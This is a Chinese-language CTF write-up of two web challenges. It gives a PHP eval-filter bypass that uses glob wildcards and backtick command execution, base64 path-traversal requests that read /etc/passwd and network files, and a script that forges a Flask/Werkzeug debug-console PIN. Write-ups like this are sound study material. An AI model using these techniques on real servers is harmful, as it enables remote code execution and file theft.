学习CTF之安恒题记
前言
一边无奈学习开发,一边不想放下自己的喜爱的信息安全方向。但我也怕顾此失彼啊,无奈。这里顺手记录下题解吧,不定时append
babybypass
出自:linkedbyX-11.11特别赛① PS:这个题目其实就是安恒9月web题原题。
<?php
include 'flag.php';
if(isset($_GET['code'])){
$code = $_GET['code'];
if(strlen($code)>35){
die("Long.");
}
if(preg_match("/[A-Za-z0-9_$]+/",$code)){
die("NO.");
}
@eval($code);
}else{
highlight_file(__FILE__);
}
//$hint = "php function getFlag() to get flag";
?>
从GET中取code键值两个要求
- 长度不能超过35
- 符合
[A-Za-z0-9_$]+正则表达式,不能出现字母数字和_$
Orz,感觉思考不出来,只记得ph牛博客中好像有一遍可以不用字母就能构造shell的。于是找了一波资料原来是这种操作。
因为正则把$给限制了加之长度限制,所以这里不能用构造变量的方法,于是采用Linux下的glob通配符
-
*可以代替0个及以上任意字符 -
?可以代表1个任意字符
GET /?code=?><?=`/???/???%20/???/???/????/*`?> HTTP/1.1
Host: 101.71.29.5:10049
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
用?>先闭合前面,再<??>使用反引号来执行shell命令
index.php源码
读到了index.php源码,flag文件就在/flag下面,那就直接读它
GET /?code=?><?=`/???/???%20/????`;?> HTTP/1.1
Host: 101.71.29.5:10049
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
flag{aa5237a5fc25af3fa07f1d724f7548d7}
这道题涉及到的知识点太多了,各位大佬的博客也是脑洞打开,各种奇淫巧技都有。后面再专做文章研究吧,在此不展开
reference
-
ph牛
-
安全客:CTF题目思考--极限利用
-
一叶飘零师傅:2018安恒杯-9月月赛Writeup
-
Angel_Kitty:记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门
粗心的程序员呀
出自:LinkedbyX-11.11特别赛③ PS:这个好像是8月月赛原题
打开地址,发现注册会报错,从错误信息中发现是Flask且开了debug,在页面中需要pin码就能打开console。还发现了页面image的src路径有蹊跷。测试是base64编码。于是存在任意文件读取漏洞。
报错
flask并不太熟悉,Python web我还没好好学flask,于是看了一波资料。又是大佬们的长篇精彩分析,这题的题解如下
根据文章对pin码的生成分析,要获取6个变量值
username # 用户名
modname # flask.app
getattr(app, '__name__', getattr(app.__class__, '__name__')) # Flask
getattr(mod, '__file__', None) # flask目录下的一个app.py的绝对路径
uuid.getnode() # mac地址十进制
get_machine_id() # /etc/machine-id
放到这题中来分别读取的payload为
-
username为ctf,读取
../../..//etc/passwd这里从页面中知道了脚本路径,这里引用相对路径。还有即使不知道,无线向上..也是可以的,payload url为
curl http://101.71.29.5:10057/image/Ly4uLy4uLy4uL2V0Yy9wYXNzd2Q= -
modename模块名为flask.app
-
uuid.getnode这个是mac地址十进制,为2485377892354。我们先用读/sys/class/net/eth0/address,在转下十进制就好了,payload url为
curl http://101.71.29.5:10057/image/Ly4uLy4uLy4uL3N5cy9jbGFzcy9uZXQvZXRoMC9hZGRyZXNz -
get_machine_id这个这里是空,
/etc/machine-id和/proc/sys/kernel/random/boot_id都空白内容。不知额 -
app的
__name__为Flask -
mod的
__file__这里试了网页上爆出的路径为/usr/local/lib/python2.7/dist-packages/flask/app.py但是这样生成的pin就是不对额,后来看表哥们的wp,这里要用pyc。PS:pyc是Python的编译后的字节码文件,如果py文件没有修改的话,都是执行pyc文件的,如果py源文件修改了pyc文件会重新编译。而且还有一个很重要的点,如果py源文件不存在,会执行pyc文件的!!原pyc文件。
import hashlib
from itertools import chain
probably_public_bits = [
'ctf',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]
private_bits = [
'2485377892354'# str(uuid.getnode()), /sys/class/net/eth0/address # 网卡十进制,读完转一下
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
最终的pin为131-442-946
然后在网页中读取下文件flag内容
读取flag
reference
Mark
- Flask安全周边学习
- Flask开发学习
后续更新~
